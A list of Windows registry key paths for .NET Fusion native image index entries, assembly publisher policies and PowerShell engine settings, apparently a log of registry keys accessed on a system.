HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Transactions,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ApplicationBase
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.ServiceProcess__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Runtime__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\DisplayName
